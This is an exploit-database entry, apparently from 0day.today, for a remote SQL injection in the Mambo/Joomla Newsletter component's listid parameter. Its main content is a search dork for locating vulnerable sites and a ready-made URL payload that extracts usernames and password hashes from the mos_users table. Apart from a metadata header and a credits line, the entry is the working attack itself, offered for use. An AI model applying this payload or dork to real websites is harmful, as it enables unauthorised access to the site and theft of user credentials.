id: 2562
date: 01/29/2008
title: Mambo Component Newsletter (listid) Remote SQL Injection Vulnerability
author: S@BUN
cves: 

======================================================================
Mambo Component Newsletter (listid) Remote SQL Injection Vulnerability
======================================================================



#########################################################################
#
# joomla SQL Injection(com_newsletter)
#########################################################################
#
# DorKs 1 : allinurl: "com_newsletter"
#
########################################################################
EXPLOIT :

index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*


#########################################################################
# S@BUN                            GOOD LUCKY                            S@BUN
#########################################################################



notes:
"Newsletter component for mambo 4.5" from Adam van Dongen, www.tim-online.nl //Thanks George



#  0day.today [2023-03-27]  #